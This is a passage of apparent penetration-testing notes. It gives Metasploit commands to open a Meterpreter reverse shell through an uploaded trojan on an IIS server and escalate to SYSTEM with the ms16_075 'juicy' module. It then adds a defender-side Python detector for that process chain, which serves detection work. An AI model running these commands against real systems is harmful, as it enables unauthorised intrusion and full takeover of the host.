msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 0.0.0.0
msf exploit(multi/handler) > set lport <port_local>
msf exploit(multi/handler) > exploit
Victim comes online
Upload the trojan x.exe through the file upload vulnerability
Run the trojan on the victim system
.\x.exe
Once it connects back successfully you get the reverse shell
meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
Privilege escalation
Send the session to the background
meterpreter > background
Check which vulnerability IDs can be exploited
<id>: session ID
msf > use post/windows/gather/enum_patches
msf post(windows/gather/enum_patches) > set session <id>
msf post(windows/gather/enum_patches) > run
Filter the exploitable modules directly
<id>: session ID
msf > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session <id>
msf post(multi/recon/local_exploit_suggester) > set showdescription true
msf post(multi/recon/local_exploit_suggester) > run
Modules marked Yes in the returned results can be used directly
Use the module to escalate privileges for the specified session
<id>: session ID
msf > use exploit/windows/local/ms16_075_reflection_juicy
msf exploit(windows/local/ms16_075_reflection_juicy) > set session <id>
msf exploit(windows/local/ms16_075_reflection_juicy) > run
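The two steps above leave a clear trail on the host: the getuid output shows the uploaded x.exe running under the IIS application pool identity (so its parent is the IIS worker process w3wp.exe), and the final escalation step ends with a process running as SYSTEM that descends from that app-pool process. The following detection logic is an added example written from the defender's side; it is not part of the original post and not Metasploit code. It walks process-creation events shaped like Windows Security event 4688 / Sysmon event 1 and flags both patterns. The event records, the process IDs and the `run_sample` helper are constructed for this example.

```python
"""Added detection example (not from the original post).

Flags (1) the IIS worker process w3wp.exe spawning any executable and
(2) a child created as SYSTEM from a parent that runs under an
IIS APPPOOL\\* identity. Sample events below are constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Accounts treated as high privilege: a child in this set whose parent
# runs as an app-pool identity is a privilege-boundary crossing.
HIGH_PRIV = {"NT AUTHORITY\\SYSTEM"}


@dataclass
class ProcEvent:
    pid: int            # new process id
    ppid: int           # parent process id
    image: str          # full path of the new process
    user: str           # account the new process runs as
    parent_image: str   # full path of the parent process


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_app_pool(user: str) -> bool:
    """True for IIS application-pool identities such as IIS APPPOOL\\DefaultAppPool."""
    return user.upper().startswith("IIS APPPOOL\\")


def detect(events: List[ProcEvent]) -> List[Dict]:
    """Run both rules over the events and return one finding per hit."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Dict] = []
    for e in events:
        # Rule 1: the IIS worker serves requests; it should not launch programs.
        if basename(e.parent_image) == "w3wp.exe":
            findings.append({"rule": "iis_worker_spawned_process",
                             "pid": e.pid, "image": e.image, "user": e.user})
        # Rule 2: parent under an app-pool identity, child created as SYSTEM.
        parent: Optional[ProcEvent] = by_pid.get(e.ppid)
        if parent is not None and is_app_pool(parent.user) and e.user.upper() in HIGH_PRIV:
            findings.append({"rule": "app_pool_to_system",
                             "pid": e.pid, "image": e.image, "parent_pid": parent.pid})
    return findings


def run_sample() -> List[Dict]:
    """Constructed event stream mirroring the chain described in the post."""
    events = [
        # w3wp.exe started by the service host: normal.
        ProcEvent(1200, 600, r"C:\Windows\System32\inetsrv\w3wp.exe",
                  r"IIS APPPOOL\DefaultAppPool", r"C:\Windows\System32\svchost.exe"),
        # Uploaded x.exe launched by the worker process: rule 1.
        ProcEvent(2200, 1200, r"C:\inetpub\wwwroot\uploads\x.exe",
                  r"IIS APPPOOL\DefaultAppPool", r"C:\Windows\System32\inetsrv\w3wp.exe"),
        # cmd.exe as SYSTEM, created by the app-pool process: rule 2.
        ProcEvent(2300, 2200, r"C:\Windows\System32\cmd.exe",
                  r"NT AUTHORITY\SYSTEM", r"C:\inetpub\wwwroot\uploads\x.exe"),
        # Interactive user opening notepad: no finding.
        ProcEvent(3000, 800, r"C:\Windows\System32\notepad.exe",
                  r"CORP\alice", r"C:\Windows\explorer.exe"),
    ]
    return detect(events)


if __name__ == "__main__":
    for f in run_sample():
        print(f)
```

Rule 1 will also fire for legitimate children of w3wp.exe on some applications (helper processes, scheduled conversions), so in production it needs a per-site allowlist of expected child images; rule 2 stays useful as-is because an app-pool identity has no legitimate reason to create SYSTEM processes. Both rules need the parent process to be captured in the same event stream, which is why correlation is done on pid/ppid rather than on the image name alone.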